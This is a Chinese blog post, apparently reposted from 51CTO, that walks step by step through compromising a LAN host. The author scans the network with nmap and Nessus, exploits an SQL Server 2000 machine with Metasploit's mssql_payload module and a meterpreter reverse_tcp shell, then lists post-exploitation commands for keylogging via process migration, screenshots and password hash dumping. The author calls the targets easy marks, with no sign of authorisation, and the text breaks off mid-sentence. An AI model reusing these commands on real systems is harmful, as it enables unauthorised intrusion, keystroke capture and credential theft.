好几天没有写新文章了,今天出差难得清静,更新一篇。
1.首先用nmap获取一下在线信息,结果如下
|
1
|
namp -sP 192.168.16.0/24
|
总共有22个IP地址存活,总会有一些肥羊的。
2.用nessus进行进一步探测,我们可以看到除了我自己的系统漏洞最多以外,有192.168.16.68,和192.168.15.254存在高危漏洞。通过进一步对比发现192.168.16.254更有价值,上面跑的有SQL数据库和Dameware mini貌似是一台服务器.
3.用namp获取一下详细信息,截图信息不全,下面是详细信息
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
|
Starting Nmap 6.25 ( http://nmap.org ) at 2013-07-11 02:52 CST
NSE: Loaded 106 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 02:52
Scanning 192.168.16.254 [1 port]
Completed ARP Ping Scan at 02:52, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:52
Completed Parallel DNS resolution of 1 host. at 02:52, 0.01s elapsed
Initiating SYN Stealth Scan at 02:52
Scanning 192.168.16.254 [1000 ports]
Discovered open port 139/tcp on 192.168.16.254
Discovered open port 445/tcp on 192.168.16.254
Discovered open port 135/tcp on 192.168.16.254
Discovered open port 1433/tcp on 192.168.16.254
Discovered open port 6129/tcp on 192.168.16.254
Completed SYN Stealth Scan at 02:52, 1.15s elapsed (1000 total ports)
Initiating Service scan at 02:52
Scanning 5 services on 192.168.16.254
Completed Service scan at 02:52, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.16.254
NSE: Script scanning 192.168.16.254.
Initiating NSE at 02:52
Completed NSE at 02:52, 0.12s elapsed
Nmap scan report for 192.168.16.254
Host is up (0.0010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.2039.00; SP4
6129/tcp open damewaremr DameWare Mini Remote Control
MAC Address: 00:E0:62:1B:4C:BD (Host Engineering)
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| Windows server name: SERVER
| [192.168.16.254\MSSQLSERVER]
| Instance name: MSSQLSERVER
| Version: Microsoft SQL Server 2000 SP4
| Version number: 8.00.2039.00
| Product: Microsoft SQL Server 2000
| Service pack level: SP4
| Post-SP patches applied: No
| TCP port: 1433
| Named pipe: \\192.168.16.254\pipe\sql\query
|_ Clustered: No
| nbstat:
| NetBIOS name: SERVER, NetBIOS user: <
unknown
>, NetBIOS MAC: 00:e0:62:1b:4c:bd (Host Engineering)
| Names
| SERVER<
00
> Flags: <
unique
><
active
>
| SERVER<
20
> Flags: <
unique
><
active
>
|_ WORKGROUP<
00
> Flags: <
group
><
active
>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: Server
| NetBIOS computer name: SERVER
| Workgroup: WORKGROUP
|_ System time: 2013-07-10T18:52:29+08:00
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 1.03 ms 192.168.16.254
NSE: Script Post-scanning.
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds
Raw packets sent: 1082 (48.306KB) | Rcvd: 1017 (41.242KB)
|
4.在metasploit查了一下漏洞利用信息,貌似是一个很老的漏洞了。
5.从namp的详细信息来看,254上存在DameWare Mini Remote Control,装了一个软件连接一下果然能够连上,但是没有系统密码。
6.最后msfpro
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
|
[*] Starting Metasploit Console...
[-] WARNING! The following modules could not be loaded!
[-] /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V4 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
http://metasploit.pro
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1134 exploits - 715 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.16.83
LHOST => 192.168.16.83
msf exploit(mssql_payload) > set RHOST 192.168.16.254
RHOST => 192.168.16.254
msf exploit(mssql_payload) > exploit
[*] Started reverse handler on 192.168.16.83:4444
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 4.40% done (4497/102246 bytes)
[*] Command Stager progress - 5.86% done (5996/102246 bytes)
[*] Command Stager progress - 7.33% done (7495/102246 bytes)
[*] Command Stager progress - 8.80% done (8994/102246 bytes)
[*] Command Stager progress - 10.26% done (10493/102246 bytes)
[*] Command Stager progress - 11.73% done (11992/102246 bytes)
[*] Command Stager progress - 13.19% done (13491/102246 bytes)
[*] Command Stager progress - 14.66% done (14990/102246 bytes)
[*] Command Stager progress - 16.13% done (16489/102246 bytes)
[*] Command Stager progress - 17.59% done (17988/102246 bytes)
[*] Command Stager progress - 19.06% done (19487/102246 bytes)
[*] Command Stager progress - 20.53% done (20986/102246 bytes)
[*] Command Stager progress - 21.99% done (22485/102246 bytes)
[*] Command Stager progress - 23.46% done (23984/102246 bytes)
[*] Command Stager progress - 24.92% done (25483/102246 bytes)
[*] Command Stager progress - 26.39% done (26982/102246 bytes)
[*] Command Stager progress - 27.86% done (28481/102246 bytes)
[*] Command Stager progress - 29.32% done (29980/102246 bytes)
[*] Command Stager progress - 30.79% done (31479/102246 bytes)
[*] Command Stager progress - 32.25% done (32978/102246 bytes)
[*] Command Stager progress - 33.72% done (34477/102246 bytes)
[*] Command Stager progress - 35.19% done (35976/102246 bytes)
[*] Command Stager progress - 36.65% done (37475/102246 bytes)
[*] Command Stager progress - 38.12% done (38974/102246 bytes)
[*] Command Stager progress - 39.58% done (40473/102246 bytes)
[*] Command Stager progress - 41.05% done (41972/102246 bytes)
[*] Command Stager progress - 42.52% done (43471/102246 bytes)
[*] Command Stager progress - 43.98% done (44970/102246 bytes)
[*] Command Stager progress - 45.45% done (46469/102246 bytes)
[*] Command Stager progress - 46.91% done (47968/102246 bytes)
[*] Command Stager progress - 48.38% done (49467/102246 bytes)
[*] Command Stager progress - 49.85% done (50966/102246 bytes)
[*] Command Stager progress - 51.31% done (52465/102246 bytes)
[*] Command Stager progress - 52.78% done (53964/102246 bytes)
[*] Command Stager progress - 54.24% done (55463/102246 bytes)
[*] Command Stager progress - 55.71% done (56962/102246 bytes)
[*] Command Stager progress - 57.18% done (58461/102246 bytes)
[*] Command Stager progress - 58.64% done (59960/102246 bytes)
[*] Command Stager progress - 60.11% done (61459/102246 bytes)
[*] Command Stager progress - 61.58% done (62958/102246 bytes)
[*] Command Stager progress - 63.04% done (64457/102246 bytes)
[*] Command Stager progress - 64.51% done (65956/102246 bytes)
[*] Command Stager progress - 65.97% done (67455/102246 bytes)
[*] Command Stager progress - 67.44% done (68954/102246 bytes)
[*] Command Stager progress - 68.91% done (70453/102246 bytes)
[*] Command Stager progress - 70.37% done (71952/102246 bytes)
[*] Command Stager progress - 71.84% done (73451/102246 bytes)
[*] Command Stager progress - 73.30% done (74950/102246 bytes)
[*] Command Stager progress - 74.77% done (76449/102246 bytes)
[*] Command Stager progress - 76.24% done (77948/102246 bytes)
[*] Command Stager progress - 77.70% done (79447/102246 bytes)
[*] Command Stager progress - 79.17% done (80946/102246 bytes)
[*] Command Stager progress - 80.63% done (82445/102246 bytes)
[*] Command Stager progress - 82.10% done (83944/102246 bytes)
[*] Command Stager progress - 83.57% done (85443/102246 bytes)
[*] Command Stager progress - 85.03% done (86942/102246 bytes)
[*] Command Stager progress - 86.50% done (88441/102246 bytes)
[*] Command Stager progress - 87.96% done (89940/102246 bytes)
[*] Command Stager progress - 89.43% done (91439/102246 bytes)
[*] Command Stager progress - 90.90% done (92938/102246 bytes)
[*] Command Stager progress - 92.36% done (94437/102246 bytes)
[*] Command Stager progress - 93.83% done (95936/102246 bytes)
[*] Command Stager progress - 95.29% done (97435/102246 bytes)
[*] Command Stager progress - 96.76% done (98934/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
当获取到一个meterpreter shell 后可以执行更多的操作:
获取屏幕截图:screenshot
获取系统信息:sysinfo
获取键盘记录:
meterpreter> ps #查看目标机器进程,假设发现explorer.exe 的进程号为1668:
meterpreter> migrate 1668 #插入该进程
meterpreter> run post/windows/capture/keylog_recorder #运行键盘记录模块,将击键记
录保存到本地txt
cat /root/.msf3/loot/*****.txt #查看结果
获取系统账号密码:
meterpreter> use priv
meterpreter> run post/windows/gather/hashdump
当获取到密码的hash 之后无法破解出明文密码且无法直接使用hash 登陆,需要使用
本文转自文东会博客51CTO博客,原文链接http://blog.51cto.com/hackerwang/1245336如需转载请自行联系原作者 谢文东666
|
